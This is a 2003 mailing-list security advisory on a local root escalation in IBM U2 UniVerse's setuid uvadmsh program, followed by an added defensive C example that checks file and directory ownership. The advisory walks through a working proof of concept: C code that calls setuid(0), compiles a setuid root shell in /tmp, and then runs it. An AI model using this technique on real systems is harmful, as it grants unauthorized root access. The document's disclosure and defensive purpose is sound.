[Full-Disclosure] SRT2003-07-07-0833 - IBM U2 UniVerse users with uvadm rights can take root via uvadmsh

From: KF (dotslashat_private)
Date: Tue Jul 15 2003 - 17:43:39 PDT


    Thanks to IBM for being so receptive with these issues.
    
    For those of you that have requested we revive the old "Snosoft" 
    advisories we have begun placing our legacy advisories at 
    http://www.secnetops.biz as time permits.
    -KF
    
    
    Secure Network Operations, Inc.           http://www.secnetops.com
    Strategic Reconnaissance Team               researchat_private
    Team Lead Contact                                 kfat_private
    
    
    Our Mission:
    ************************************************************************
    Secure Network Operations offers expertise in Networking, Intrusion 
    Detection Systems (IDS), Software Security Validation, and 
    Corporate/Private Network Security. Our mission is to facilitate a 
    secure and reliable Internet and inter-enterprise communications 
    infrastructure through the products and services we offer. 
    
    
    Quick Summary:
    ************************************************************************
    Advisory Number         : SRT2003-07-07-0833
    Product                 : IBM U2 UniVerse
    Version                 : Version <= 10.0.0.9 ?
    Vendor                  : http://ibm.com/software/data/u2/universe/
    Class                   : local
    Criticality             : High (to UniVerse servers with local users) 
    Operating System(s)     : Only confirmed on Linux (other unix based?)
    
    
    High Level Explanation
    ************************************************************************
    High Level Description  : users with uvadm rights can take root
    What to do              : chmod -s /usr/ibm/uv/bin/uvadmsh
    
    
    Technical Details
    ************************************************************************
    Proof Of Concept Status : SNO does have PoC code for this issue. 
    Low Level Description   : 
    
    UniVerse is an extended relational database designed for embedding in 
    vertical applications. Its nested relational data model results in 
    intuitive data modeling and fewer resulting tables. UniVerse provides 
    data access, storage and management capabilities across Microsoft®
    Windows® NT, Linux and UNIX platforms.
    
    The creation and use of the Unix user 'uvadm' is optional for UniVerse. 
    It is not required for the successful installation, configuration and
    administration of UniVerse. The intended use of uvadm is to allow a
    selected, specific non-root user to perform all aspects of UniVerse
    administration.
    
    The uvadmsh program checks the user's name against the string "uvadm",
    which means that in order to exploit this issue you need to have access
    to the user uvadm. 
    
    [kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp
    ...
    strcmp("kf", "uvadm")                                        = -1
    
    [uvadm@vegeta uvadm]$ id
    uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)
    
    You will note that with the proper uid the binary begins looking for 
    the command line option "-uv.install" which is the path to a binary
    file to execute.
    
    [uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp
    ...
    strcmp("uvadm", "uvadm")                                     = 0
    strcmp("-uv.install", "-uv.install")                         = 0
    
    This condition is fairly easy to take advantage of as you can see here. 
    
    [uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c
    main()
    {
    setuid(0);
    system("cc -o /tmp/owned /tmp/owned.c");
    system("chmod 4755 /tmp/owned");
    }
    
    [uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c
    [uvadm@vegeta uvadm]$ cat > /tmp/owned.c
    main()
    {
    setuid(0);
    system("/bin/bash");
    }
    
    [uvadm@vegeta uvadm]$ ls -al /tmp/owned
    ls: /tmp/owned: No such file or directory
    
    [uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp
    [uvadm@vegeta uvadm]$ ls -al /tmp/owned
    -rwsr-xr-x    1 root     uvadm       11640 Jul  2 20:15 /tmp/owned
    
    [uvadm@vegeta uvadm]$ /tmp/owned
    [root@vegeta uvadm]# id
    uid=0(root) gid=503(uvadm) groups=503(uvadm)
    
    Patch or Workaround     : chmod -s /usr/ibm/uv/bin/uvadmsh
    
    Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user
    to perform all of the uvadmsh functions.
    
    Vendor Status           : The IBM U2 staff will have this issue resolved 
    in a future release of IBM U2. Patches may also be supplied on a per 
    client basis at IBM's discretion. 
    
    Bugtraq URL             : to be assigned
    
    ------------------------------------------------------------------------
    This advisory was released by Secure Network Operations, Inc. as a matter
    of notification to help administrators protect their networks against
    the described vulnerability. Exploit source code is no longer released
    in our advisories. Contact researchat_private for information on how
    to obtain exploit information.
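
The ltrace output in the Technical Details shows uvadmsh comparing the caller's user name with "uvadm" and then accepting a "-uv.install" location supplied on the command line. As an added example (not code from this advisory, from SNO or from IBM), the C code below shows the ownership and permission check a setuid helper can make before it executes a file from a caller-supplied directory. The names open_trusted_program, owner_only and demo are hypothetical, and in a setuid-root helper the trusted uid would be 0; the fixture uses the caller's own uid so it runs unprivileged.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* True if the object is owned by `trusted` and not group/other writable. */
static int owner_only(const struct stat *st, uid_t trusted) {
    return st->st_uid == trusted && !(st->st_mode & (S_IWGRP | S_IWOTH));
}

/* Added example with hypothetical names, not uvadmsh source. Opens dir/name
 * for execution (e.g. fexecve) only if nobody but `trusted` could have planted
 * or changed it; checks use fstat on open descriptors. Returns an fd or -1. */
int open_trusted_program(const char *dir, const char *name, uid_t trusted) {
    struct stat st;
    int fd = -1, dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd >= 0 && fstat(dfd, &st) == 0 && owner_only(&st, trusted))
        fd = openat(dfd, name, O_RDONLY | O_NOFOLLOW);
    if (dfd >= 0)
        close(dfd);
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
                    !owner_only(&st, trusted))) {
        close(fd);
        fd = -1;
    }
    return fd;
}

/* Constructed fixture; the caller's uid stands in for root (0).
 * Bit 0: private directory accepted. Bit 1: world-writable one refused. */
int demo(void) {
    char dir[] = "/tmp/uvchkXXXXXX", path[64];
    int fd, seen = 0;
    if (!mkdtemp(dir))
        return -1;
    snprintf(path, sizeof path, "%s/uv.install", dir);
    if ((fd = open(path, O_CREAT | O_WRONLY, 0755)) >= 0)
        close(fd);
    if ((fd = open_trusted_program(dir, "uv.install", geteuid())) >= 0)
        seen |= 1, close(fd);
    chmod(dir, 0777);
    if (open_trusted_program(dir, "uv.install", geteuid()) < 0)
        seen |= 2;
    unlink(path);
    rmdir(dir);
    return seen;
}
int main(void) { printf("demo() = %d\n", demo()); return 0; }
```

With the trusted uid set to 0, a world-writable directory such as /tmp and any file owned by uvadm are both refused.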
    
    
    
    